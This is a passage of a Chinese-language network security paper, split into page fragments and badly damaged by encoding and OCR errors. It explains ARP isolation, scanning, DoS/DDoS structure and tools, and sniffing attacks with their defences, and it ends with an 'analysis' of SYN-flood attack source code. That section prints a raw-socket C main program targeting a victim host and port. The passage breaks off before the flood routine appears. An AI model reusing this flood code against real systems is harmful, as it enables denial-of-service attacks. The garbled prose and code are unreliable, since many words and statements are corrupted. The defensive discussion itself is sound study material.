47、離廣播包。一個(gè)VLAN 就是一個(gè)邏輯廣播域，通過(guò)VLAN 技術(shù)可以在局域網(wǎng)中創(chuàng)建多個(gè)子網(wǎng)，就在局域網(wǎng)中隔離了廣播，縮小了廣播范圍，也就減小了廣播風(fēng)暴的產(chǎn)生幾率。局域網(wǎng)的網(wǎng)絡(luò)管理員可根據(jù)網(wǎng)絡(luò)的拓?fù)浣Y(jié)構(gòu)，具體規(guī)劃出若干個(gè)VLAN，當(dāng)管理員發(fā)現(xiàn)有非法用戶在惡意利用ARP攻擊網(wǎng)絡(luò),或因合法用戶受ARP 病毒感染而影響網(wǎng)絡(luò)時(shí)，網(wǎng)絡(luò)管理員可利用技術(shù)手段首先查找到該用戶所在的交換機(jī)端口，然后將該端口劃一個(gè)單獨(dú)的VLAN 將該用戶與其他用戶進(jìn)行物理隔離

48、，以避免對(duì)其他用戶產(chǎn)生影響。劃分安全域的方法能在一定程度上有效緩解ARP 攻擊的傳播，但缺點(diǎn)是：安全域劃分太細(xì)會(huì)使局域網(wǎng)的管理和資源共享不方便。</p><p><b>　　4.2 網(wǎng)絡(luò)掃描</b></p><p>　　掃描器( Scanner ) 是一種自動(dòng)檢測(cè)遠(yuǎn)程或本地主機(jī)安全性弱點(diǎn)的程序。掃描器通過(guò)發(fā)送特定的網(wǎng)絡(luò)數(shù)據(jù)包，記錄目標(biāo)主機(jī)的應(yīng)答消息，從而可以收集關(guān)于

49、目標(biāo)主機(jī)的各種信息或者測(cè)試主機(jī)的性能。掃描器也是一把雙刃劍，可以作為安全管理人員檢查、測(cè)試主機(jī)和網(wǎng)絡(luò)安全性的工具，幫助管理員發(fā)現(xiàn)問(wèn)題，防患于未然。另一方面，有惡意目的的人員利用掃描器收集主機(jī)和網(wǎng)絡(luò)的信息，發(fā)掘其中的脆弱點(diǎn)，為攻擊做準(zhǔn)備。</p><p>　?。?）網(wǎng)絡(luò)診斷命令，對(duì)目標(biāo)系統(tǒng)進(jìn)行掃描可以手動(dòng)進(jìn)行，也可以使用掃描工具自動(dòng)進(jìn)行。在手動(dòng)進(jìn)行掃描時(shí)，需要熟悉各種網(wǎng)絡(luò)命令，并對(duì)命令執(zhí)行后的輸出進(jìn)行分析。用掃描工

50、具進(jìn)行掃描時(shí)，工具本身一般都提供數(shù)據(jù)分析的功能。</p><p>　　ping 命令。Ping 命令經(jīng)常用來(lái)對(duì)TCP／IP 網(wǎng)絡(luò)進(jìn)行診斷。通過(guò)向目標(biāo)計(jì)算機(jī)發(fā)送一個(gè)ICMPechorequest 數(shù)據(jù)包，目標(biāo)計(jì)算機(jī)收到后發(fā)送ICMPechoreply 數(shù)據(jù)包，如果能夠收到reply 數(shù)據(jù)包，就說(shuō)明網(wǎng)絡(luò)能夠連通。通過(guò)ping命令，不僅可以判斷目標(biāo)計(jì)算機(jī)是否正在運(yùn)行，還可以了解網(wǎng)絡(luò)的大致延時(shí)。</p>&

51、lt;p>　?。?）端口掃描，端口是傳輸層的TCP和UDP協(xié)議與上層應(yīng)用程序之間的接口點(diǎn)。攻擊者可以利用每一個(gè)端口作為入侵系統(tǒng)的通道。端口掃描就是通過(guò)向目標(biāo)主機(jī)的指定端口發(fā)送數(shù)據(jù)包，根據(jù)目標(biāo)端口的反應(yīng)確定哪些端口是開(kāi)放的。此外，還可以根據(jù)端口返回的旗標(biāo)(banners) 信息進(jìn)一步判斷端口上運(yùn)行的服務(wù)類型，以及對(duì)應(yīng)軟件版本甚至操作系統(tǒng)類型。</p><p>　?。?）脆弱性掃描，脆弱性掃描是檢測(cè)遠(yuǎn)程或本地主

52、機(jī)系統(tǒng)脆弱性的技術(shù)，它通過(guò)獲取主機(jī)信息或者與主機(jī)的TCP／IP 端口建立連接并請(qǐng)求服務(wù)，記錄目標(biāo)主機(jī)的應(yīng)答，從而發(fā)現(xiàn)主機(jī)或網(wǎng)絡(luò)內(nèi)在的安全弱點(diǎn)。由于它把繁瑣的安全檢測(cè)過(guò)程通過(guò)程序自動(dòng)完成，不僅減輕了管理者的工作，還縮短了檢測(cè)時(shí)問(wèn)，因而成為網(wǎng)絡(luò)管理的重要手段和工具。</p><p>　　（4）掃描的防范，攻擊者對(duì)潛在的目標(biāo)進(jìn)行掃描一般是攻擊的前奏。掃描能獲取系統(tǒng)信息，發(fā)掘系統(tǒng)存在的脆弱性。為了降低被攻擊的風(fēng)險(xiǎn)，應(yīng)該從

53、以下幾方面對(duì)掃描進(jìn)行防范。修正系統(tǒng)和網(wǎng)絡(luò)，使其暴露盡可能少的信息。例如，修改系統(tǒng)和服務(wù)器的旗標(biāo)信息，許多服務(wù)軟件都提供了這個(gè)功能，可以定制系統(tǒng)和服務(wù)器返回給客戶端的提示信息；修正系統(tǒng)或者網(wǎng)絡(luò)，減少其脆弱性，比如關(guān)閉不必要的網(wǎng)絡(luò)服務(wù)，給系統(tǒng)和軟件及時(shí)打補(bǔ)丁等；入侵檢測(cè)系統(tǒng)一般能發(fā)現(xiàn)正在進(jìn)行的掃描，所以應(yīng)該安裝網(wǎng)絡(luò)入侵檢測(cè)系統(tǒng)或主機(jī)入侵檢測(cè)系統(tǒng)，對(duì)于發(fā)現(xiàn)的掃描行為，要及時(shí)處理，避免攻擊者的進(jìn)一步行動(dòng)； 掃描器也是安全管理的助手，作為網(wǎng)絡(luò)管理

54、員和主機(jī)用戶，應(yīng)該時(shí)常對(duì)自己管理的網(wǎng)絡(luò)和系統(tǒng)進(jìn)行掃描，提前發(fā)現(xiàn)問(wèn)題，防患于未然。</p><p><b>　　4.3 拒絕服務(wù)</b></p><p>　　DoS的攻擊方式有很多種,最基本的DoS攻擊就是利用合理的服務(wù)請(qǐng)求來(lái)占用過(guò)多的服務(wù)資源,從而使合法用戶無(wú)法得到服務(wù)的響應(yīng)。單一的DoS攻擊一般是采用一對(duì)一方式的,當(dāng)攻擊目標(biāo)CPU速度低、內(nèi)存小或者網(wǎng)絡(luò)帶寬小等等各項(xiàng)

55、性能指標(biāo)不高它的效果是明顯的。</p><p>　　圖4.3 攻擊示意圖</p><p>　　如圖4.3,一個(gè)比較完善的DDoS攻擊體系分成四大部分,先來(lái)看一下最重要的第2和第3部分：它們分別用做控制和實(shí)際發(fā)起攻擊。請(qǐng)注意控制機(jī)與攻擊機(jī)的區(qū)別,對(duì)第4部分的受害者來(lái)說(shuō),DDoS的實(shí)際攻擊包是從第3部分攻擊傀儡機(jī)上發(fā)出的,第2部分的控制機(jī)只發(fā)布命令而不參與實(shí)際的攻擊。對(duì)第2和第3部分計(jì)算機(jī)

56、,黑客有控制權(quán)或者是部分的控制權(quán),并把相應(yīng)的DDoS程序上傳到這些平臺(tái)上,這些程序與正常的程序一樣運(yùn)行并等待來(lái)自黑客的指令,通常它還會(huì)利用各種手段隱藏自己不被別人發(fā)現(xiàn)。在平時(shí),這些傀儡機(jī)器并沒(méi)有什么異常,只是一旦黑客連接到它們進(jìn)行控制,并發(fā)出指令的時(shí)候,攻擊傀儡機(jī)就成為害人者去發(fā)起攻擊了。</p><p>　　DoS攻擊的基本原理及現(xiàn)狀。 DoS攻擊一般包括以下三個(gè)步驟：</p><p>

57、　　(1)攻擊者通過(guò)掃描工具尋找一個(gè)或多個(gè)能夠入侵的系統(tǒng)，并獲得系統(tǒng)的控制權(quán)。然后，在被攻陷的系統(tǒng)中安裝DoS的管理者(handler)。這一步常常針對(duì)緩存溢出漏洞或系統(tǒng)安全配置漏洞來(lái)進(jìn)行。</p><p>　　(2)攻擊者利用掃描工具大量掃描并攻擊存在安全漏洞的系統(tǒng)，獲得該系統(tǒng)的控制權(quán)。在被攻陷的系統(tǒng)中安裝并運(yùn)行DoS的攻擊代理(agent)。</p><p>　　(3)攻擊者通過(guò)han

58、dler通知攻擊代理攻擊的目標(biāo)以及攻擊類型等。很多攻擊工具的將攻擊者、攻擊代理和handler之間的通信信道加密以便較好地隱藏DoS攻擊網(wǎng)絡(luò)．在收到攻擊指令后，攻擊代理發(fā)起真正的攻擊。</p><p>　　早期的攻擊者大多采取手工方式將DoS攻擊工具(handler,agent等)安裝至存在安全漏洞的系統(tǒng)中，因此要求攻擊者具有較高的水平。隨著攻擊工具的快速發(fā)展，攻擊工具的自動(dòng)化程度越來(lái)越高。從掃描到探測(cè)，再到安裝

59、都可以自動(dòng)完成。例如，DDoS攻擊工具T0mkit利用腳本來(lái)實(shí)施自動(dòng)的掃描、探測(cè)、安裝。在ramen蠕蟲(chóng)出現(xiàn)以后，很多攻擊者開(kāi)始利用這類蠕蟲(chóng)的自動(dòng)掃描、探測(cè)、安裝、傳播的特點(diǎn)來(lái)安裝和傳播DoS攻擊工具。有些蠕蟲(chóng)，如紅色代碼(Code Red)，以及后來(lái)出現(xiàn)的紅色代碼II，本身就可以發(fā)起對(duì)指定目標(biāo)的TCP SYNDoS攻擊。</p><p>　　在基于handler的DDoS攻擊模型中，由于handler和agen

60、t之間需要用指定端口通信，因此比較容易被發(fā)現(xiàn)。并且，由于handler和agent相互存有對(duì)方的信息，所以一旦其中之一被發(fā)現(xiàn)，整個(gè)DDoS攻擊網(wǎng)絡(luò)就會(huì)被破壞。在IRC(Intemet Relay Chat)流行以后，攻擊者利用IRC與攻擊代理進(jìn)行通信，在這里，IRC相當(dāng)于以前的handler。攻擊者與IRC服務(wù)器建立連接，然后利用完全合法的通信信道控制一組攻擊代理發(fā)動(dòng)攻擊。因此，1RC的使用給發(fā)現(xiàn)DDoS攻擊網(wǎng)絡(luò)帶來(lái)了極大的挑戰(zhàn)，大大提

61、高了DDoS攻擊網(wǎng)絡(luò)的生存能力，是DDoS攻擊技術(shù)的一個(gè)巨大進(jìn)步?，F(xiàn)在，有很多基于IRC的DDoS攻擊代理被包含在有自傳播能力的蠕蟲(chóng)中自動(dòng)地廣泛傳播，如Knight／Kaiten。</p><p>　　攻擊代理通常采用向目標(biāo)主機(jī)發(fā)送大量的網(wǎng)絡(luò)分組的方式來(lái)進(jìn)行。使用的分組類型通常有以下幾種：</p><p>　　◆TCP洪流(floods)。向目標(biāo)主機(jī)發(fā)送大量設(shè)置了不同標(biāo)志的TCP分組．常被

62、利用的標(biāo)志包括：SYN,ACK,RST。其中，TCPSYN攻擊導(dǎo)致目標(biāo)主機(jī)不斷地為T(mén)CP連接分配內(nèi)存，從而使其它功能不能分配到足夠的內(nèi)存。Trinoo就是一種分布式的TCP SYNDoS攻擊工具。</p><p>　　◆ICMP Echo請(qǐng)求／響應(yīng)報(bào)文(如，Ping floods)。向目標(biāo)主機(jī)發(fā)送大量的ICMP分組。</p><p>　　◆UDP洪流。向目標(biāo)主機(jī)發(fā)送大量的UDP分組。一些D

63、DoS工具，如TFN，能夠使用上面列出的幾種分組發(fā)起攻擊。一些DoS攻擊工具還常常改變攻擊分組流中的分組的某些字段來(lái)達(dá)到各種目的，例如：</p><p>　　■源IP地址。假冒IP地址(re spoofing)主要有兩種目的：隱藏分組的真正的源地址；使主機(jī)將響應(yīng)發(fā)送給被攻擊的主機(jī)。后者的例子很常見(jiàn)，如smurf或fraggle攻擊。</p><p>　　■源／目的端口號(hào)。很多利用TCP或U

64、DP分組洪流來(lái)實(shí)旌攻擊的DoS工具有時(shí)通過(guò)改變分組中的源或目的端口號(hào)來(lái)抵抗分組過(guò)濾。</p><p>　　■其它的IP頭字段。在已發(fā)現(xiàn)的DoS攻擊事件中，有些DoS攻擊工具除了保持分組首部中的目的IP地址不變外，隨機(jī)選擇分組流中的每一個(gè)分組的IP首部中的其它各個(gè)字段的值。</p><p>　　攻擊者只有擁有足夠的特權(quán)，就可以很容易產(chǎn)生和傳送帶有偽造的屬性值的網(wǎng)絡(luò)分組，這是因?yàn)門(mén)CP／IP協(xié)

65、議棧(IPv4)不提供機(jī)制來(lái)確保分組屬性的完整性。</p><p>　　DoS攻擊響應(yīng)的技術(shù)。</p><p>　　到目前為止，還沒(méi)有一種有效抵抗DoS的攻擊的技術(shù)和方法，現(xiàn)有的對(duì)付DoS攻擊的方案主要有四種。一種是通過(guò)丟棄惡意分組的方法保護(hù)網(wǎng)絡(luò)；另一種是在源端控制Dog世擊；第三種是追溯(tmceback)發(fā)起攻擊的源端，然后阻止它發(fā)起新的攻擊；第四種是路由器動(dòng)雒測(cè)流量并進(jìn)行控制。上述措

66、施只能部分地減輕DoS攻擊所造成的危害，而不能從根本上解決問(wèn)題。</p><p>　?。?）分組過(guò)濾。為了避免被攻擊，有些站點(diǎn)對(duì)于特定的流量進(jìn)行過(guò)濾(丟棄)。分組過(guò)濾的一個(gè)例子是用防火墻過(guò)濾掉所有來(lái)自某些攻擊主機(jī)的報(bào)文，另一個(gè)例子是為了防止著名的smuff攻擊而設(shè)置過(guò)濾器過(guò)濾掉所有ICMP(Intemet Control Message Protoc01)ECHO報(bào)文。這種基于特定攻擊主機(jī)或者內(nèi)容的過(guò)濾方法的作用

67、只限于已經(jīng)定義了的固定的過(guò)濾器，不適合動(dòng)態(tài)變化的攻擊模式。還有一種“輸</p><p>　　入診斷”方案‘”，由受害者提供攻擊特征，沿途的ISP(Intemet Service Provider)配合將攻擊分組過(guò)濾掉，但是這種方案需要各個(gè)ISP的網(wǎng)絡(luò)管理員人工配合，工作強(qiáng)度高、時(shí)間耗費(fèi)大，因此較難實(shí)施。</p><p>　?。?）源端控制。通常參與DoS攻擊的分組使用的源IP地址都是假冒的

68、，因此如果能夠防止IP地址假冒就能夠防IP此類的DoS攻擊。通過(guò)某種形式的源端過(guò)濾可以減少或消除假冒IP地址的現(xiàn)象,從而防范DoS攻擊。例如，路由器檢查來(lái)自與其直接相連的網(wǎng)絡(luò)分組的源IP地址，如果源IP地址非法(與該網(wǎng)絡(luò)不匹配)則丟棄該分組。</p><p>　　現(xiàn)在越來(lái)越多的路由器支持源端過(guò)濾。但是，源端過(guò)濾并不能徹底消除IP地址假冒。例如，一個(gè)ISP的客戶計(jì)算機(jī)仍然能夠假冒成該ISP網(wǎng)絡(luò)內(nèi)的成百上千個(gè)計(jì)算機(jī)中

69、的任一個(gè)其他計(jì)算機(jī)。</p><p>　?。?）追溯。追溯發(fā)起攻擊的源端的方法不少，這些方法假定存在源地址假冒，它試圖在攻擊的源處抑制攻擊，并誤別惡意的攻擊源。它在m地址假冒的情況下也可以工作，是日后采取必要的法律等手段防止將來(lái)的攻擊的必要一步。但是追溯過(guò)程中并不能實(shí)時(shí)控制攻擊的危害，當(dāng)攻擊很分散的時(shí)候也不能做到有效的追溯。已有的追溯方法主要有：</p><p>　　IP追溯。路由器使用部

70、分路徑信息標(biāo)記經(jīng)過(guò)的分組。由于DoS攻擊發(fā)生時(shí)，攻擊流中包括大量的具有共同特征的分組，因此，追溯機(jī)制只需以一定的概率抽樣標(biāo)記其中的部分分組。受害主機(jī)利用這些標(biāo)記分組中的路徑信息重構(gòu)攻擊路徑以定位大致的攻擊源。在攻擊結(jié)束之后依然可以追溯。</p><p>　　ICMP追溯。路由器以、_定的概率抽樣標(biāo)記其轉(zhuǎn)發(fā)的部分分組，并向所標(biāo)記的分組的目的地址發(fā)送ICMP消息。消息中包括該路由器的身份，抽樣分組的內(nèi)容，鄰近的路由器

71、信息。在受到攻擊時(shí)，受害主機(jī)可以利用這些信息重構(gòu)攻擊路徑，找到攻擊者。</p><p>　　鏈路測(cè)試。這種方法從離受害主機(jī)最近的路由器開(kāi)始，交互測(cè)試其上游鏈路，遞歸執(zhí)行，直到確定攻擊路徑。它只有在攻擊進(jìn)行時(shí)才有效。具體方法包括：輸入調(diào)試(Input Debugging)，受控涌入(Controlled Flooding)等。</p><p>　?。?）路由器動(dòng)態(tài)監(jiān)測(cè)和控制。最近，有些研究人

72、員提出在路由器上動(dòng)態(tài)檢測(cè)和控制DoS攻擊引起的擁塞。其主要依據(jù)是DoS攻擊分組雖然可能來(lái)源于多個(gè)流，但這些流肯定有某種共同的特征，比如有共同的目的地址或源地址(或地址前綴)或者都是TCP SYN類型的報(bào)文。這些流肯定在某些路由器的某些輸出鏈路上聚集起來(lái)并造成大量的分組丟失。這些有著共同特征的流可以稱為流聚(aggregate)。其主要設(shè)想是流聚集所通過(guò)的路由器有可能通過(guò)分析分組丟失的歷史辯識(shí)出這種流聚集。如果一個(gè)路由器辯識(shí)出了這些高帶寬

73、的流聚集，它就可以通知送來(lái)這些流聚集的上游路由器限制其發(fā)送速率。這種由發(fā)生擁塞的路由器發(fā)起的回推(pushback)信號(hào)可能一直遞歸地傳播到源端。這種機(jī)制從直觀上不難理解，如果能夠?qū)嵱脛t對(duì)于解決DoS攻擊問(wèn)題有很好的前途。文獻(xiàn)[4】中也對(duì)這種擁塞控制機(jī)制進(jìn)行了簡(jiǎn)單的模擬研究，顯示該機(jī)制可以取季導(dǎo)一定的效果。但是這種機(jī)制在實(shí)際的網(wǎng)絡(luò)中能否實(shí)用面臨著檢測(cè)標(biāo)準(zhǔn)、公平性機(jī)制、高效實(shí)現(xiàn)以及運(yùn)營(yíng)管理等很多未解決的問(wèn)題。</p><

74、;p><b>　　4.4 網(wǎng)絡(luò)嗅探 </b></p><p>　　嗅探(Sniffer)技術(shù)是網(wǎng)絡(luò)安全攻防技術(shù)中很重要的一種。對(duì)黑客來(lái)說(shuō),通過(guò)嗅探技術(shù)能以非常隱蔽的方式攫取網(wǎng)絡(luò)中的大量敏感信息,與主動(dòng)掃描相比,嗅探行為更難被察覺(jué),也更容易操作。對(duì)安全管理人員來(lái)說(shuō),借助嗅探技術(shù),可以對(duì)網(wǎng)絡(luò)活動(dòng)進(jìn)行實(shí)時(shí)監(jiān)控,并進(jìn)行發(fā)現(xiàn)各種網(wǎng)絡(luò)攻擊行為。</p><p>　　嗅探原理

75、。嗅探器(Sniffer)最初是作為網(wǎng)絡(luò)管理員檢測(cè)網(wǎng)絡(luò)通信的一種工具,它既可以是軟件,又可以是一個(gè)硬件設(shè)備.軟件Sniffer應(yīng)用方便,針對(duì)不同的操作系統(tǒng)平臺(tái)都有多種不同的軟件Sniffer,而且很多都是免費(fèi)的;硬件Sniffer通常被稱作協(xié)議分析器,其價(jià)格一般都很高昂. 在局域網(wǎng)中,由于以太網(wǎng)的共享式特性決定了嗅探能夠成功.因?yàn)橐蕴W(wǎng)是基于廣播方式傳送數(shù)據(jù)的,所有的物理信號(hào)都會(huì)被傳送到每一個(gè)主機(jī)節(jié)點(diǎn),此外網(wǎng)卡可以被設(shè)置成混雜接

76、收模式(Promiscuous),這種模式下,無(wú)論監(jiān)聽(tīng)到的數(shù)據(jù)幀目的地址如何,網(wǎng)卡都能予以接收.而TCP/IP協(xié)議棧中的應(yīng)用協(xié)議大多數(shù)明文在網(wǎng)絡(luò)上傳輸,這些明文數(shù)據(jù)中,往往包含一些敏感信息(如密碼,賬號(hào)等),因此使用Sniffer可以悄無(wú)聲息地監(jiān)聽(tīng)到所有局域網(wǎng)內(nèi)的數(shù)據(jù)通信,得到這些敏感信息.同時(shí)Sniffer的隱蔽性好,它只是"被動(dòng)"接收數(shù)據(jù),而不向外發(fā)送數(shù)據(jù),所以在傳輸數(shù)據(jù)的過(guò)程中,根本無(wú)法覺(jué)察到有人監(jiān)聽(tīng).當(dāng)然,S

77、niffer的局限性是只能在局域網(wǎng)的沖突域中進(jìn)行,或者是在點(diǎn)到點(diǎn)連接的中間節(jié)點(diǎn)上進(jìn)行監(jiān)聽(tīng). 在交換網(wǎng)絡(luò)中,雖然避免了利用網(wǎng)卡</p><p>　　（1）MAC洪水。交換機(jī)要負(fù)責(zé)建立兩個(gè)節(jié)點(diǎn)間的"虛電路",就必須維護(hù)一個(gè)交換機(jī)端口與MAC地址的映射表,這個(gè)映射表是放在交換機(jī)內(nèi)存中的,但由于內(nèi)存數(shù)量的有限,地址映射表可以存儲(chǔ)的映射表項(xiàng)也有限.如果惡意攻擊者向交換機(jī)發(fā)送大量的虛假M(fèi)AC地址數(shù)

78、據(jù),有些交換機(jī)在應(yīng)接不暇的情況下,就會(huì)像一臺(tái)普通的Hub那樣只是簡(jiǎn)單地向所有端口廣播數(shù)據(jù),嗅探者就可以借機(jī)達(dá)到竊聽(tīng)的目的.當(dāng)然,并不是所有交換機(jī)都采用這樣的處理方式,況且,如果交換機(jī)使用靜態(tài)地址映射表,這種方法就失靈了. （2）MAC復(fù)制。MAC復(fù)制實(shí)際上就是修改本地的MAC地址,使其與欲嗅探主機(jī)的MAC地址相同,這樣,交換機(jī)將會(huì)發(fā)現(xiàn),有兩個(gè)端口對(duì)應(yīng)相同的MAC地址,于是到該MAC地址的數(shù)據(jù)包將同時(shí)從這兩個(gè)交換機(jī)端口發(fā)送出去.這種

79、方法與后面將要提到的ARP欺騙有本質(zhì)的不同,前者是欺騙交換機(jī),后者是毒害主機(jī)的ARP緩存而與交換機(jī)沒(méi)有關(guān)系.但是,只要簡(jiǎn)單設(shè)置交換機(jī)使用靜態(tài)地址映射表,這種欺騙方式也就失效了. （3）ARP欺騙。按照ARP協(xié)議的設(shè)計(jì),為了減少網(wǎng)絡(luò)上過(guò)多的ARP數(shù)據(jù)通信,一臺(tái)主機(jī),即使受到的ARP應(yīng)答并非自己請(qǐng)求得到的,它也會(huì)</p><p>　　網(wǎng)絡(luò)嗅探的防范與檢測(cè)。</p><p>　　網(wǎng)絡(luò)嗅探

80、由于其特性所決定, 一般的殺毒軟件和掃描軟件很難檢測(cè)到它的存在。用戶也容易將用戶名、密碼或者銀行賬號(hào)之類的重要信息泄漏出來(lái)。采取必要的網(wǎng)絡(luò)安全防范與檢測(cè)措施有:</p><p>　　(1) 分割網(wǎng)段, 設(shè)置VLAN。</p><p>　　細(xì)化網(wǎng)絡(luò)會(huì)使得局域網(wǎng)中被嗅探監(jiān)聽(tīng)的可能性減小, 這是因?yàn)榫钟蚓W(wǎng)下的各種方法無(wú)法跨網(wǎng)段進(jìn)行, 使用交換機(jī)等設(shè)備就可以有效地阻止嗅探。將相互信任的主機(jī)放在一起

81、, 組成各個(gè)小網(wǎng)段, 讓嗅探的可能性和必要性降至最低。</p><p>　　(2) 使用靜態(tài)ARP表</p><p>　　靜態(tài)ARP 表采用手工輸入的方法, 在連網(wǎng)的過(guò)程中, 不處理A RP 響應(yīng)包。不對(duì)ARP表做任何修改。但是靜態(tài)ARP 表必須得到操作系統(tǒng)的支持, Window s 操作統(tǒng)雖然設(shè)置了靜態(tài)ARP表, 但仍然會(huì)根據(jù)ARP 應(yīng)答包修改ARP表中的內(nèi)容。</p>&

82、lt;p>　　(3) 利用交換機(jī)本身的功能和特性手動(dòng)綁定</p><p>　　如果交換機(jī)具有端口安全保護(hù)功能, 應(yīng)該將其開(kāi)啟。開(kāi)啟這種功能后, 交換機(jī)的每個(gè)端口將只與唯一的MAC 地址相關(guān)聯(lián), 從而有效地防范MAC 地址偽裝和MAC 地址洪水。給交換機(jī)端口手工配置MAC 地址。在交換機(jī)每個(gè)瑞口都進(jìn)行靜態(tài)MAC 配置, 用ARP 命令手工綁定端口地址和Mac 地址, 生成靜態(tài)數(shù)據(jù)庫(kù), 可以有效防止ARP 欺騙

83、網(wǎng)關(guān)設(shè)備。但這樣做會(huì)給管理員帶來(lái)很大的工作量, 從后期維護(hù)來(lái)看, 效果并不是很好, 而且容易出錯(cuò)。因此一般只對(duì)連接路由器的端口手工配置MAC 地址, 以防止路由器的MAC地址被假冒。在不是很重要的情況下, 不要打開(kāi)交換機(jī)端口的tr unk 設(shè)置。對(duì)于三層交換機(jī), 一般可以在端口上設(shè)置IP 包過(guò)濾機(jī)制。通過(guò)lP包過(guò)濾機(jī)制, 禁用主機(jī)的IP 轉(zhuǎn)發(fā)功能, 以防被嗅探者利用。管理員可以根據(jù)IP 地址直接控制流經(jīng)各端口的數(shù)據(jù)流。</p>

84、;<p>　　(4) 使用安全協(xié)議與數(shù)據(jù)加密通信</p><p>　　采用這種方法就是即使嗅探者可以監(jiān)聽(tīng)到信息, 也無(wú)法閱讀信息。采用各種數(shù)據(jù)加密手段, 對(duì)于電子郵件程序, 可以考慮采用S/ MIME 或PGP, 前者可以內(nèi)置到電子郵件程序中, 后者可以作為插件使用。對(duì)于HTT P, 可使用SSL 技術(shù),作為Web 服務(wù)器和瀏覽器中的內(nèi)置組件, 可以加密用戶的信用卡等重要信息。對(duì)于遠(yuǎn)程登錄, 應(yīng)該用

85、ssh 代替普通的telnet , 其它很多協(xié)議也可以通過(guò)SSh 進(jìn)行隧道傳輸。</p><p>　　(5) MAC 檢測(cè)</p><p>　　網(wǎng)卡處于混雜模式時(shí), 它會(huì)將其自動(dòng)接收到的數(shù)據(jù)都向內(nèi)核協(xié)議棧提交。向所懷疑的主機(jī)發(fā)送定制的ICMP Echo Request 包, 在數(shù)據(jù)包內(nèi)將其IP 對(duì)應(yīng)的MAC 地址改成一個(gè)不存在的值。此主機(jī)系統(tǒng)會(huì)返回響應(yīng)包( 如果處于混雜模式) 或忽略( 如

86、果不處于混雜模式) 而暴露其工作模式。</p><p>　　(6) DNS 檢測(cè)</p><p>　　許多嗅探程序?qū)?jīng)常需要對(duì)在ARP 包中發(fā)現(xiàn)的IP 地址進(jìn)行反向解析1即使這些IP 地址并不存在) , 因此, 如果發(fā)現(xiàn)某主機(jī)對(duì)不存在的IP 地址的DN S 反向解析請(qǐng)求, 可以初步斷定嗅探程序的存在。</p><p>　　5 SYN Flood 攻擊源代碼分析&l

87、t;/p><p>　　5.1 主程序源代碼及分析</p><p>　　首先介紹主程序部分，源代碼如下：</p><p>　　1 # inciude<sys / socket.h></p><p>　　2 # inciude<netinet / in.h></p><p>　　3 # inciude&

88、lt;netdb.h></p><p>　　4 # inciude<ctypes.h></p><p>　　5 int main（int argc，char argv[]）</p><p><b>　　6 {</b></p><p>　　7 int sockfd；</p><p>

89、;　　8 struct sockaddr_in addr；</p><p>　　9 struct hostent *victim；</p><p>　　10 int on=1；</p><p>　　11 i（f argc!=3）{</p><p>　　12 print（f“usage：synfiood host port\n”）；</p

90、><p>　　13 exi（t 1）；</p><p><b>　　14 }</b></p><p>　　15 bzero（Saddr，sizeo（f addr））；</p><p>　　16 addr.sin_famiiy=AF_INET；</p><p>　　17 addr.sin_port=ht

91、on（s ato（i argv[2]））；</p><p>　　18 i（f inet_aton（argv[1]，Saddr.sin_addr）==0）{</p><p>　　19 victim=gethostbyname（argv[1]）；</p><p>　　20 i（f victim ==NULL）{</p><p>　　21 prin

92、tf （“hostns name error： s s \n”，argv [1]，hstrerror</p><p>　?。╤_errno））；</p><p>　　22 exi（t 1）；</p><p><b>　　23 }</b></p><p>　　24 addr.sin_addr=*（struct in_add

93、r *）（* victim ->h_addr_iist）[0]；</p><p><b>　　25 }</b></p><p>　　26 sockfd=socke（t AF_INET，SOCK_RAW，0）；</p><p>　　27 i（f sockfd<0）{</p><p>　　28 print（f“s

94、ocket error： s\n”，strerro（r errno））；</p><p>　　29 exi（t 1）；</p><p><b>　　30 }</b></p><p>　　31 setsockop（t sockfd，IPPROTO_IP，IP_HDRINCL，Son，sizeo（f on））；</p><p&g

95、t;　　32 setuid（getpid（））；</p><p>　　33 send_synfiood（sockfd，Saddr）；</p><p><b>　　34 }</b></p><p>　　這個(gè)程序從命令行中獲得對(duì)方主機(jī)的名稱和端口號(hào)</p><p>　　Line 1、2、8、15-17：Linux 系統(tǒng)的套接

96、字可以支持多種協(xié)議，每一種協(xié)議都使用不同的套接字地址結(jié)構(gòu)。在頭文件<iinux / socket.h>中定義了以下結(jié)構(gòu)來(lái)保持套接字函數(shù)調(diào)用參數(shù)的一致性。</p><p>　　struct sockaddr</p><p><b>　　{</b></p><p>　　unsigned short sa_famiiy；</p>

97、;<p>　　char sa_data[14]；</p><p><b>　　}；</b></p><p>　　其中的sa_famiiy 為套接字的協(xié)議族地址類型，TCP / IP 的對(duì)于IPv4 地址類型為AF_INET。sa_data 中存儲(chǔ)具體的協(xié)議地址，不同的協(xié)議簇有不同的地址格式。</p><p>　　但一般編程中并不直

98、接針對(duì)此數(shù)據(jù)結(jié)構(gòu)操作，而是使用另一個(gè)與sockaddr 等價(jià)的數(shù)據(jù)結(jié)構(gòu)sockaddr_in（在netinet / in.h 中定義的）。</p><p>　　struct sockaddr_in</p><p>　　{sunsigned hort int sin_ien；/ *IPv4 地址長(zhǎng)度* /</p><p>　　short int sin_famiiy；

99、/ * 地址類型* /</p><p>　　unsigned short int sin_port；/ * 存儲(chǔ)端口號(hào)* /</p><p>　　struct in_addr sin_addr；/ * 存儲(chǔ)IP 地址* /</p><p>　　unsigned char sin_zero[8]；/ * 空字節(jié)* /</p><p><b

100、>　　}；</b></p><p>　　sockaddr_in 的結(jié)構(gòu)定義實(shí)際上是對(duì)sockaddr 中sa_data</p><p>　　[14]的細(xì)分。sin_port 存儲(chǔ)端口號(hào)（使用網(wǎng)絡(luò)字節(jié)順序），數(shù)據(jù)類</p><p>　　型是一個(gè)16 位的無(wú)符號(hào)整數(shù)類型；sin_addr 存儲(chǔ)IP 網(wǎng)絡(luò)地址；</p><p>　

101、　sin_zero[8]添零補(bǔ)足。</p><p>　　網(wǎng)絡(luò)中存在多種類型的機(jī)器，這些不同類型的機(jī)器表示數(shù)據(jù)的字節(jié)順序不同。所謂“字節(jié)順序”指的是網(wǎng)絡(luò)和主機(jī)采用存儲(chǔ)字節(jié)時(shí)內(nèi)存順序安排方式的差異。在網(wǎng)絡(luò)環(huán)境下存儲(chǔ)時(shí)，把高位字節(jié)存放在內(nèi)存地址的起始位置，把低位字節(jié)安排在地址的較高位置；主機(jī)形式的安排順序恰好相反。為了在不同類型的硬件設(shè)備之間正確地接收和發(fā)送數(shù)據(jù)，必須采用統(tǒng)一的字節(jié)順序，網(wǎng)絡(luò)協(xié)議中的數(shù)據(jù)采用統(tǒng)一的網(wǎng)絡(luò)字

